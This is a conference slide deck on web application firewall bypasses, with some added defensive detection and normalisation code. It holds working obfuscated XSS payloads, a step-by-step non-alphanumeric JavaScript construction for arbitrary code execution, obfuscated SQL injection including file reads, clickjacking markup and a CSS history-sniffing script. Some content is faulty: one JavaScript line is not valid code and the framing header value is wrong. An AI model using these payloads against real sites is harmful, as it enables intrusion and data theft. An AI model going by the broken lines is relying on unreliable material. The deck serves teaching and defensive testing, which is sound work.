Firewalls (WAFs)
Ing. Pavol Lupták, CISSP, CEH
Lead Security Consultant
www.nethemba.com

Nethemba: All About Security

- Highly experienced certified IT security experts (CISSP, C|EH, SCSecA)
- Core business: all kinds of penetration tests, comprehensive web application security audits, local system and wifi security audits, security consulting, forensic analysis, secure VoIP, ultra-secure systems
- OWASP activists: leaders of the Slovak/Czech OWASP chapters, co-authors of the most recognized OWASP Testing Guide v3.0, working on the new version
- We are the only company in Slovakia / the Czech Republic that offers:
  - Penetration tests and security audits of SAP
  - Security audits of smart RFID cards
  - Unique own and sponsored security research in many areas (see our references: vulnerabilities in public transport SMS tickets, cracked the most used Mifare Classic RFID cards)

What are WAFs?

- Emerged from IDS/IPS focused on the HTTP protocol and HTTP-related attacks
- Usually contain a lot of complex regexp rules to match
- Support special features like cookie encryption, CSRF protection, etc.
- Except for the free mod_security they are quite expensive (and often there is no correlation between the price and their filtering capabilities)

WAF implementations

- Usually they are deployed in blacklisting mode, which is more vulnerable to bypasses and targeted attacks
- The application context (the type of allowed inputs) must be known to deploy the more secure whitelisting mode
- All WAFs can be bypassed
- A WAF is just a workaround, but from the security point of view it can be cost-effective

WAF filter rules

- Directly reflect WAF effectiveness
- For most WAF vendors they are closely guarded secrets; most determined attackers are able to bypass them without seeing the actual rules
- Open source WAFs (mod_security, PHPIDS) have open source rules, which is better: it allows more scrutiny by skilled penetration testers

Typical WAF bypasses

Blocked attack               | Undetected modification
' or 1=1--                   | ' or 2=2--
alert(0)                     | %00alert(0)
<script>alert(0)</script>    | <script type=vbscript>MsgBox(0)</script>
' or ''''='r                 | '/**/OR/**/''''='
<script>alert(0)</script>    | <img src=http://url onload=alert(0)//></img>
1 or 1=1                     | (1)or(1)=(1)
eval(name)                   | x=this.name
                             | X(0?$:name+1)
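The blacklisting-versus-whitelisting point of the previous slides, as an added example that is not part of the deck: a naive blacklist rule catches the left column of the table but not the trivially modified right column, while a whitelist derived from the application context (here a username field) rejects both without knowing anything about the attack. The rules, the username format and the sample inputs are constructed for illustration and are not any vendor's rule set.

```javascript
// Added example (not from the Nethemba deck): a blacklist rule versus a
// whitelist rule over the same inputs. Rules and inputs are constructed.

// Blacklist: recognises one well-known SQL injection probe and <script> tags.
// It catches "' or 1=1--" but not "' or 2=2--", the same "undetected
// modification" the table above lists.
const BLACKLIST_RULES = [
  /'\s*or\s*1\s*=\s*1/i,   // ' or 1=1
  /<script\b[^>]*>/i,      // <script ...>
];

function blacklistBlocks(input) {
  return BLACKLIST_RULES.some((rule) => rule.test(input));
}

// Whitelist: the application context says this parameter is a username of
// at most 32 letters, digits, dots or underscores. Anything else is rejected
// regardless of which injection trick it carries.
const USERNAME_WHITELIST = /^[A-Za-z0-9._]{1,32}$/;

function whitelistAllows(input) {
  return USERNAME_WHITELIST.test(input);
}

// Run both policies over a list of inputs and report the outcome per input.
function evaluatePolicies(inputs) {
  return inputs.map((input) => ({
    input,
    blacklistBlocks: blacklistBlocks(input),
    whitelistAllows: whitelistAllows(input),
  }));
}

// Constructed sample inputs: one benign username and two attack/variant pairs
// taken from the table above.
const SAMPLE_INPUTS = [
  "alice.smith",                              // benign username
  "' or 1=1--",                               // blocked by the blacklist
  "' or 2=2--",                               // same attack, passes the blacklist
  "<script>alert(0)</script>",                // blocked by the blacklist
  "<img src=http://url onload=alert(0)//>",   // passes the blacklist
];

for (const r of evaluatePolicies(SAMPLE_INPUTS)) {
  console.log(
    `${r.input.padEnd(40)} blacklist blocks: ${r.blacklistBlocks}  whitelist allows: ${r.whitelistAllows}`
  );
}
```

The whitelist is only possible because the field's meaning is known; that is the "application context" the deck says is needed before a whitelisting mode can be deployed.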

Yes, WAFs may also be vulnerable!

- A WAF also increases the attack surface of a target organization
- A WAF may be the target of, and vulnerable to, malicious attacks, e.g. XSS, SQL injection, denial of service attacks, remote code execution vulnerabilities
- These vulnerabilities have been found in all types of WAF products (!)

Typical bypass flow

1. Find out which characters/sequences are allowed by the WAF
2. Make an obfuscated version of your injected payload
3. Test it and watch for the WAF/application response
4. If it does not work, modify it and retry from step 2

Javascript obfuscation

- Javascript has very powerful features
- A Javascript payload is used in XSS attacks
- It is full of evals, expression closures, generator expressions, iterators, special characters and shortcuts
- Supports a lot of encodings (unicode multibyte characters, hexadecimal, octal, a combination of all of them)
- Supports XOR, encryption, Base64

Non-alphanumeric javascript code

Even if only a few characters are allowed it is possible to construct fully functional code:

_=[]|[];$=_++;__=(_<<_);___=(_<<_)+_;____=__+__;_____=__+___; // $=0, _=1, __=2, ___=3, ____=4, _____=5
$$=({}+"")[_____]+(+{}+"")[_]+({}[$]+"")[_]+(($!=$)+"")[___]+(($==$)+"")[$]+(($==$)+"")[_]+(($==$)+"")[__]+({}+"")[_____]+(($==$)+"")[$]+({}+"")[_]+(($==$)+"")[_]; // "constructor"
$$$=(($!=$)+"")[_]+(($!=$)+"")[__]+(($==$)+"")[___]+(($==$)+"")[_]+(($==$)+"")[$]; // "alert"
$_$=({}+"")[+_____]+({}+"")[_]+({}+"")[_]+(($!=$)+"")[__]+({}+"")[__+_____]+({}+"")[_____]+(+{}+"")[_]+({}[$]+"")[__]+(($==$)+"")[___]; // the string passed to alert
($)[$$][$$]($$$+"('"+$_$+"')")() // (0)["constructor"]["constructor"] is Function

([,,,,,,]=!{}+{},[[,]=!!+][+++])()[++++](~)
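A detection heuristic for payloads like the one above, added here as an example that is not part of the deck: code built only from `[] + ! ( ) { } $ _` has a character mix no ordinary form value has, so a filter that cannot enumerate every encoding can still flag inputs whose punctuation density and count of the deck's building blocks (`+[]`, `![]`, `{}+`, `++[`) are abnormal. The symbol set, the thresholds and the sample inputs are constructed starting points, not tuned values.

```javascript
// Added example (not from the deck): coarse detection of non-alphanumeric
// JavaScript by punctuation density plus a count of the primitive tricks
// the deck relies on. Thresholds and samples are constructed.

const JS_OBFUSCATION_SYMBOLS = new Set("[]{}()+!$_=<>~|".split(""));

// Fraction of characters that belong to the symbol set above.
function symbolRatio(input) {
  if (input.length === 0) return 0;
  let hits = 0;
  for (const ch of input) if (JS_OBFUSCATION_SYMBOLS.has(ch)) hits++;
  return hits / input.length;
}

// Primitive building blocks: +[] (number 0), ![] (false), {}+ (object to
// string), ++[ (increment trick), []+ (array to string).
const PRIMITIVES = [/\+\[\]/g, /!\[\]/g, /\{\}\+/g, /\+\+\[/g, /\[\]\+/g];

function primitiveHits(input) {
  let total = 0;
  for (const re of PRIMITIVES) total += (input.match(re) || []).length;
  return total;
}

// Flag when the input is long enough to carry code, is dominated by the
// symbol alphabet and contains several of the primitives.
function looksLikeNonAlnumJs(
  input,
  { minLength = 16, minRatio = 0.8, minPrimitives = 3 } = {}
) {
  return (
    input.length >= minLength &&
    symbolRatio(input) >= minRatio &&
    primitiveHits(input) >= minPrimitives
  );
}

// Constructed samples: the deck's expression for the character 'a', a benign
// search query, and a benign form value that happens to contain brackets.
const SAMPLES = [
  "(+[][+[]]+[])[++[[]][+[]]]",
  "cheap flights to prague",
  "items[0]=apple&items[1]=pear",
];

for (const s of SAMPLES) {
  console.log(
    `${looksLikeNonAlnumJs(s) ? "FLAG" : "pass"} ratio=${symbolRatio(s).toFixed(2)} primitives=${primitiveHits(s)} ${s}`
  );
}
```

The ratio alone would also flag a short bracketed value such as `[[]]`, which is why the minimum length and the primitive count are part of the decision; a whitelist on the field is still the stronger control.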

Let's bypass WAF!

- Example situation: the WAF blocks alpha characters and numbers (probably not a very real situation, just a proof of concept :)
- It allows only a few special characters: (){}_=[];$!+<>
- Let's generate fully non-alphanumeric javascript code!

Possibilities of the Javascript language

- We can use numbers to obtain a single character in a string, e.g. index zero for accessing the first character: abc[0]
- We can use addition (+), subtraction (-), multiplication (*), division (/), modulus (%), increment (++), decrement (--)
- We know that mathematical operators perform automatic numeric conversion and string operators perform automatic string conversion

Source of different alphanumeric characters in Javascript

Javascript object / error state | String result
{}+''                           | [object Object]
+[][+[]]                        | NaN
[][+[]]+[]                      | undefined
[![]]+[]                        | false
[!![]]+[]                       | true

Shortest possible ways to create zero without using numbers

Characters | Result
+[]        | 0
+''        | 0
+""        | 0
-[]        | 0
-''        | 0
-""        | 0

Generating numbers

+[]                            // 0
++[[]][+[]]                    // 1
+!+[]                          // 1
++[++[[]][+[]]][+[]]           // 2
!+[]+!+[]                      // 2
++[++[++[[]][+[]]][+[]]][+[]]  // 3
!+[]+!+[]+!+[]                 // 3

Gain alpha characters without directly using them

When we define a Javascript object using the object literal and concatenate it with a string, the result is [object Object]

_={}+''; // [object Object]
alert(_[1]) // returns the 'o' character

Generate the string 'alert' without using any alphanumeric characters

- Let's start with 'a'
- What Javascript object contains 'a'? We can use 'NaN' (Not a Number)
- Access an empty string with index 0 (undefined) and convert it to a number (NaN)

+[][+[]] // result: NaN

Generating the 'a' character

NaN[1] = 'a'

++[[]][+[]]                 // 1
+[][+[]]+[]                 // result string: NaN
(+[][+[]]+[])[++[[]][+[]]]  // a

We have the character 'a'

Generating the 'l' character

- Use boolean false
- We can use the ! (NOT) operator, e.g. ''==0 // true
- Use a blank array (string) and then the NOT operator to obtain a boolean, wrap it with [] and convert it to a string

([![]]+[]) // string false

Generating the 'l' character

++[++[[]][+[]]][+[]]                           // 2
([![]]+[])                                     // string false
'false'[2] = ([![]]+[])[++[++[[]][+[]]][+[]]]  // 'l'

We have the 'l' character!

Generating the 'e' character

It's easy, we can use boolean true

([!![]]+[])                                             // string 'true'
++[++[++[[]][+[]]][+[]]][+[]]                           // 3
'true'[3] = ([!![]]+[])[++[++[++[[]][+[]]][+[]]][+[]]]  // e

And we have the 'e' character!

Generating the 'r' character

It's easy, we can use boolean true

([!![]]+[])                           // string 'true'
++[[]][+[]]                           // 1
'true'[1] = ([!![]]+[])[++[[]][+[]]]  // r

And we have the 'r' character!

Generating the 't' character

It's easy, we can use boolean true

([!![]]+[])                   // string 'true'
+[]                           // 0
'true'[0] = ([!![]]+[])[+[]]  // t

And we have the 't' character!

And now we have the 'alert' string!

(+[][+[]]+[])[++[[]][+[]]]+([![]]+[])[++[++[[]][+[]]][+[]]]+([!![]]+[])[++[++[++[[]][+[]]][+[]]][+[]]]+([!![]]+[])[++[[]][+[]]]+([!![]]+[])[+[]] // string 'alert'

How to execute the code of our choice?

- It is necessary to return the window object to access all properties of window
- If you can access a constructor, you can access the Function constructor to execute arbitrary code
- The shortest possible way to get window is:

alert((1,[].sort)()) // shows the window object!

Works in all browsers except IE

How to generate the 'sort' string

- We know how to generate the string 'alert'
- We need to generate the 'sort' string

'false'[3] = ([![]]+[])[++[++[++[[]][+[]]][+[]]][+[]]] // 's'

- We can gain 'o' from []+{} ([object Object])

([]+{})[++[[]][+[]]] // o

- We have already generated 'r' and 't'

And now we have the 'sort' string

([![]]+[])[++[++[++[[]][+[]]][+[]]][+[]]]+([]+{})[++[[]][+[]]]+([!![]]+[])[++[[]][+[]]]+([!![]]+[])[+[]] // string 'sort'

Let's build it together: call alert(1)

(1,[].sort)().alert(1)

After changing the number 1 and all alpha characters to their obfuscated versions we get:

([],[][([![]]+[])[++[++[++[[]][+[]]][+[]]][+[]]]+([]+{})[++[[]][+[]]]+([!![]]+[])[++[[]][+[]]]+([!![]]+[])[+[]]])()[(+[][+[]]+[])[++[[]][+[]]]+([![]]+[])[++[++[[]][+[]]][+[]]]+([!![]]+[])[++[++[++[[]][+[]]][+[]]][+[]]]+([!![]]+[])[++[[]][+[]]]+([!![]]+[])[+[]]](++[[]][+[]]) // calls alert(1)!

How to call any arbitrary Javascript function

Using the array constructor (accessing the constructor twice from an array object returns Function):

[].constructor.constructor("alert(1)")()

We need to generate the remaining letters 'c', 'n', 'u'; gain them from the output of the [].sort function:

function sort() { [native code] }

SQL obfuscation

- What is obfuscation of an SQL injection vector?
- Different DBMSs have different SQL syntax; most of them support Unicode, Base64, hex, octal and binary representation, escaping, hashing algorithms (MD5, SHA1)
- Many blacklisted characters can be replaced by their functional alternatives (0xA0 in MySQL)
- Obfuscated comments: it is difficult to determine what is a comment and what is not

SQL obfuscation examples

SELECT CONCAT(char(x'70617373',b'1110111011011110111001001100100'))

s/*/e/**//*e*//*/l/*le*c*//*/ect~~/**/1

SELECT LOAD_FILE(0x633A5C626F6F742E696E69) (M)

SELECT(extractvalue(0x3C613E61646D696E3C2F613,0x2F61))
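The decoding a filter has to perform before any rule can match, as an added example that is not from the deck and not any WAF's code: it turns the three MySQL literal forms used on the slide (0x.. hex, x'..' hex string, b'..' bit string) back into their byte content and replaces /* */ comments with a space (so a comment separates tokens, as it does for MySQL), then runs the slide's own examples through it. The helper names are this example's; the odd-length hex value is left untouched, which is what happens to the truncated extractvalue() literal on the slide.

```javascript
// Added example (not from the deck): normalisation of obfuscated SQL literals
// and comments before rule matching. Helper names are this example's own.

// Render decoded bytes as a quoted SQL string so a rule sees the value the
// database would evaluate (e.g. a file path or XML fragment).
function bytesToText(hex) {
  let out = "";
  for (let i = 0; i + 1 < hex.length; i += 2) {
    out += String.fromCharCode(parseInt(hex.slice(i, i + 2), 16));
  }
  return "'" + out.replace(/'/g, "''") + "'";
}

// b'..' literals are a big-endian integer; pad to whole bytes, then decode.
function bitsToText(bits) {
  const padded = bits.padStart(Math.ceil(bits.length / 8) * 8, "0");
  let hex = "";
  for (let i = 0; i < padded.length; i += 8) {
    hex += parseInt(padded.slice(i, i + 8), 2).toString(16).padStart(2, "0");
  }
  return bytesToText(hex);
}

// Decode the three literal forms. Odd-length hex (a truncated capture) is
// left as is rather than silently misdecoded.
function decodeLiterals(sql) {
  return sql
    .replace(/\bx'([0-9a-f]+)'/gi, (m, hex) => (hex.length % 2 ? m : bytesToText(hex)))
    .replace(/\b0x([0-9a-f]+)\b/gi, (m, hex) => (hex.length % 2 ? m : bytesToText(hex)))
    .replace(/\bb'([01]+)'/gi, (m, bits) => bitsToText(bits));
}

// Replace each /* ... */ comment with a single space and collapse whitespace.
// An unterminated /* is left in place so it stays visible to later rules.
function stripComments(sql) {
  return sql.replace(/\/\*[\s\S]*?\*\//g, " ").replace(/\s+/g, " ").trim();
}

function normalizeSql(sql) {
  return stripComments(decodeLiterals(sql));
}

// The slide's own examples plus one constructed comment-separated query.
const SLIDE_EXAMPLES = [
  "SELECT CONCAT(char(x'70617373',b'1110111011011110111001001100100'))",
  "SELECT LOAD_FILE(0x633A5C626F6F742E696E69)",
  "SELECT(extractvalue(0x3C613E61646D696E3C2F613,0x2F61))",
  "SELECT/**/1/*anything*/FROM/**/t",
];

for (const sql of SLIDE_EXAMPLES) console.log(normalizeSql(sql));
```

After normalisation the first slide example reads `SELECT CONCAT(char('pass','word'))` and the LOAD_FILE() argument shows up as `'c:\boot.ini'`, which is what a keyword or path rule needs to see; matching the raw hex would require a rule per encoding.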

New SQL features

- MySQL/PostgreSQL support XML functions:

SELECT UpdateXML('<script x=_></script>', '/script/@x', 'src=//0x.lv');

- HTML5 supports local DB storage (SQLite 3.1+) (openDatabase object); it can be misused for persistent XSS and local SQL injection attacks

Existing obfuscation tools

- Hackvertor: http://hackvertor.co.uk/public
- HackBar: https://addons.mozilla.org/en-US/firefox/addon/hack
- Malzilla: http://malzilla.sourceforge.net/
- Your imagination :)

Summary

- WAFs are just workarounds!
- The best solution is to care about security in every SDLC phase and strictly validate all inputs and outputs in the application
- Use whitelisting instead of blacklisting (both in the application and the WAF!)
- Use multilayer security: 3rd layer database architecture or database firewalls
  - for SQL use prepared statements
  - for HTML use HTMLPurifier or the OWASP AntiSamy project

References

- Web Application Obfuscation: http://www.amazon.com/WebApplicationObfuscati
- XSS Attacks: Cross Site Scripting Exploits and Defense: http://www.amazon.com/XSSAttacksScriptingExp

Special thanks to Mario Heiderich and Stefano Di Paola

UI redressing attacks: clickjacking

<style>
iframe { filter:alpha(opacity=0); opacity:0; position:absolute; top:0px; left:0px; height:300px; width:250px; }
img { position:absolute; top:0px; left:0px; height:300px; width:250px; }
</style>
<img src=WHAT_THE_USER_SEES />
<iframe src=WHAT_THE_USER_IS_ACTUALLY_INTERACTING_WITH></iframe>

Clickjacking protection

- Block framing using X-FRAME-OPTIONS: NEVER

<body>
<script>
if (top != self) document.write('<plaintext>');
</script>
...

CSS history attack

<style>
a { position:relative; }
a:visited { position:absolute; }
</style>
<a id=v href=http://www.google.com/>Google</a>
<script>
var l = document.getElementById('v');
var c = getComputedStyle(l).position;
c == 'absolute' ? alert('visited') : alert('not visited');
</script>

CSS history exploitation methods

- Social network deanonymization attacks
- Session ID / CSRF token local brute force attack
- LAN scanners
- Fixed in Firefox 4.0; current browsers are vulnerable